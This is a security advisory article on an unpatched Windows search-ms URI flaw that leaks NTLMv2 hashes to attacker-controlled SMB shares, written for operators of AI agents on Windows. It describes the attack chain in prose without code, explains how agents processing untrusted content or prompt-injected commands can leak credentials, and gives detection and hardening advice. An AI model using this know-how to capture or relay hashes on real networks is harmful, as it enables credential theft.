Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes

An unpatched vulnerability in Windows Search URI handlers is enabling attackers to capture NTLMv2 hashes through malicious search queries, exposing enterprise credentials without any user interaction beyond clicking a crafted link. The attack leverages Windows' built-in search protocol to force authentication attempts to attacker-controlled SMB shares, relaying the resulting challenge-response hashes for offline cracking or relay attacks. For AI agent operators managing Windows-based infrastructure, this represents a critical supply chain exposure that can compromise service accounts and lateral movement paths.

How the Attack Works

The vulnerability resides in how Windows handles search-ms: URI protocols when resolving remote resource paths. When a user opens a malicious link or document containing a specially crafted search-ms URI pointing to an attacker-controlled UNC path, Windows automatically attempts to authenticate to that remote share using the current user's credentials. This triggers an NTLM challenge-response handshake, during which the attacker captures the NTLMv2 hash.

Unlike traditional phishing that requires credential entry, this attack is entirely passive from the victim's perspective. The hash capture happens through the normal Windows authentication flow, making it invisible to most users and undetected by standard endpoint protection that doesn't monitor protocol handler abuse. The captured NTLMv2 hash can then be subjected to offline brute-force attacks to recover the plaintext password, or used in pass-the-hash or NTLM relay scenarios to authenticate as the victim to other services.

The search-ms protocol is particularly dangerous because it is a legitimate Windows feature. Disabling it entirely may break enterprise search functionality, creating a tension between security and usability that defenders must navigate carefully.

Real-World Implications for AI Agent Deployments

AI agents operating on Windows hosts face amplified risk from this vulnerability. Agents that process external content—emails, documents, web pages, or user-generated attachments—may inadvertently trigger malicious URIs during normal workflow execution. Because many AI agents run with service account privileges, a successful hash capture can compromise high-value credentials with broad network access.

The bash tool environment in agent frameworks demonstrates the broader pattern of credential exposure through automated processing. As seen in Anthropic's agent toolset, even carefully designed environments require explicit scrubbing of sensitive variables like ANTHROPIC_API_KEY to prevent prompt-injected commands from extracting credentials. Similarly, Windows agents must now account for protocol handlers that silently leak authentication material without any explicit command execution.

Agents that parse HTML, markdown, or rich text formats from untrusted sources are especially vulnerable. A single malicious search-ms:// link embedded in a document processed by an agent can trigger the hash leak chain, even if the agent never renders the content to a human user.

Detection and Defensive Measures

Detecting this attack requires monitoring for anomalous NTLM authentication attempts initiated by protocol handlers rather than normal file share access. Security teams should correlate Windows Event ID 4624 (logon events) with process creation events for explorer.exe or browser processes that spawn SMB connections to external IPs.

For immediate mitigation, organizations can implement several layered controls:

• Block search-ms URIs at the email gateway and web proxy: Filter these protocols before they reach endpoints. Most organizations do not have legitimate business use cases for search-ms links from external sources.
• Disable NTLM where feasible: Move to Kerberos-only authentication for internal services to reduce the attack surface of hash relay. Use Group Policy to restrict NTLM usage to specific trusted servers.
• Implement SMB signing and EPA: Enable SMB signing and Extended Protection for Authentication to prevent NTLM relay attacks even if hashes are captured.
• Network segmentation: Isolate agent workloads from general user networks to limit lateral movement if an agent service account is compromised.

Configuration patterns for Windows environments should explicitly restrict protocol handler behavior. Where agents must process external documents, run them in sandboxed contexts without domain credentials, or under accounts with no access to sensitive network resources.

Urgency and Immediate Actions

This vulnerability remains unpatched, meaning exploitation requires no zero-day development—only a crafted URI and an attacker-controlled SMB listener. The barrier to entry is low, and the value of captured NTLMv2 hashes in enterprise environments is high.

AI agent operators should prioritize three immediate actions:

1. Audit agent workflows that parse or render external content on Windows hosts. Identify any paths where URIs are resolved rather than sanitized.
2. Apply network-level blocks for search-ms and other high-risk protocol handlers at ingress points.
3. Review service account permissions for agent processes and implement least-privilege access, ensuring that compromised credentials cannot pivot to critical infrastructure.

The original research and technical details on this vulnerability can be found at The Hacker News.

Key Takeaways

Protocol handlers like search-ms represent an under-examined attack surface in automated environments. AI agents magnify the impact because they process content at scale with privileged credentials, often without human oversight. Defending against NTLMv2 hash exposure requires a combination of network filtering, authentication hardening, and architectural isolation of agent workloads. Until a patch is available, assume that any Windows agent processing external content is a viable target for this attack chain.